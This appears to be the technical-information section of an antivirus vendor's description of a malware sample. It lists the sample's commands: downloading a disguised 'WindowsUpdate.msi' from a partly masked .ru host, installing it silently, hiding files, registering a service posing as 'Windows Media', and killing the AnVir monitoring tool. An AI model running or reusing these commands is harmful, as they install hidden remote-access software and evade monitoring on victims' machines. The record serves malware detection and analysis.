Техническая информация
- '%TEMP%\7ZipSfx.000\wget.exe' http://he##2.ru/2/WindowsUpdate.msi
- '<SYSTEM32>\reg.exe' delete "HKCR\Installer\Products\C4EFB40B11F78D94DAEF6897938D68AF" /f
- '<SYSTEM32>\msiexec.exe' /I "WindowsUpdate.msi" /qn
- '<SYSTEM32>\ping.exe' 127.0.0.1
- '<SYSTEM32>\attrib.exe' +s +h +r "<SYSTEM32>\hemp"
- '<SYSTEM32>\sc.exe' config RManService start= "auto"
- '<SYSTEM32>\sc.exe' description RManService "Windows Media alloy media files downloads"
- '<SYSTEM32>\sc.exe' config RManService displayname= "Windows Media"
- '<SYSTEM32>\taskkill.exe' /f /im anvir.exe
- '<SYSTEM32>\wscript.exe' "%TEMP%\7ZipSfx.000\error.vbs"
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\7ZipSfx.000\install.cmd" "
- '<SYSTEM32>\chcp.com' 1251
- '<SYSTEM32>\msiexec.exe' /x {B04BFE4C-7F11-49D8-ADFE-867939D886FA} /qn REBOOT=ReallySuppress
- '<SYSTEM32>\msiexec.exe' /V
- '<SYSTEM32>\msiexec.exe' /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /qn REBOOT=ReallySuppress
- %TEMP%\7ZipSfx.000\wget.exe
- %TEMP%\7ZipSfx.000\WindowsUpdate.msi
- %TEMP%\7ZipSfx.000\install.cmd
- %TEMP%\7ZipSfx.000\error.vbs
- %TEMP%\7ZipSfx.000\wget.exe
- %TEMP%\7ZipSfx.000\WindowsUpdate.msi
- %TEMP%\7ZipSfx.000\error.vbs
- %TEMP%\7ZipSfx.000\install.cmd
- 'he##2.ru':80
- he##2.ru/2/WindowsUpdate.msi
- DNS ASK he##2.ru
- ClassName: '' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''